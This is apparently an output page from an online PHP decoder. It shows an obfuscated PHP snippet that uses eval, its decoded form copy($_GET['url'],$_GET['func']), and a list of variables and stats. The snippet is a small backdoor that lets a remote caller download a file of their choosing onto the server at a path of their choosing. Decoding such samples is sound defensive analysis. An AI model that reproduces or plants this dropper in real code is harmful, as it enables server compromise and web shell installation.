Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $item['ad'] = '$_G';$t['a'] = "ET['func']";$a = $item['ad'].$t['a'];$c['a'] = '$_G';..

Decoded Output download

copy($_GET['url'],$_GET['func']);

Did this file decode correctly?

Original Code

<?php $item['ad'] = '$_G';$t['a'] = "ET['func']";$a = $item['ad'].$t['a'];$c['a'] = '$_G';$c['b'] = "ET['url']";$c = $c['a'].$c['b'];$items['ad'] = 'co';$ts['a'] = "py($c,$a);";$b = $items['ad'].$ts['a'];@eval($b); ?>

Function Calls

None

Variables

$a $_GET['func']
$b copy($_GET['url'],$_GET['func']);
$c $_GET['url']
$t [{'key': 'a', 'value': "ET['func']"}]
$ts [{'key': 'a', 'value': "py($_GET['url'],$_GET['func']);"}]
$item [{'key': 'ad', 'value': '$_G'}]
$items [{'key': 'ad', 'value': 'co'}]

Stats

MD5 3ab4896975aa8be67a8fb4f5173524ec
Eval Count 1
Decode Time 113 ms